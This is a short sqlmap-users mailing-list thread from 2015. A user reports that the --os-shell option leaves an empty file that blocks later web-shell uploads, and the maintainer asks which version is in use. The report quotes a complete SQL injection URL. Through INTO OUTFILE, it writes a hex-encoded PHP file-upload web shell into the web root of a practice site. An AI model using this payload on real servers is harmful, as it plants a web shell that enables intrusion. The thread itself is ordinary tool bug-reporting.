Re: [sqlmap-users] SQLmap --os-shell BUG

Sat, 04 Jul 2015 15:41:53 -0700 

Which revision/version of sqlmap do you use? There has been a related patch
a month ago. Will check tomorrow.

Bye

On Sun, Jul 5, 2015 at 12:33 AM, Danux <dan...@gmail.com> wrote:

> Hello list, there is an issue with sqlmap when using the --os-shell option
> in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>
> Description:
>
> A specific PAYLOAD (see below) used to upload a web shell will create an
> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
> attempt will fail with an "already exist" error and therefore not able
> to upload the web shell.
>
>
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>
> By default, MySQL will throw an error if the file already exists:
>
> mysql> select 'ss' into outfile
> '/var/www/OwaspPractice/upload/tmpbezff.php';
> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
> already exists
>
> Solution:
>
> 1. Change the web shell name for every new PAYLOAD attempt, at least when
> using the -os-shell option
> 2. Fix the PAYLOAD causing problems.
>
> --
> DanUx
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Don't Limit Your Business. Reach for the Cloud.
GigeNET's Cloud Solutions provide you with the tools and support that
you need to offload your IT needs and focus on growing your business.
Configured For All Businesses. Start Your Cloud Today.
https://www.gigenetcloud.com/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to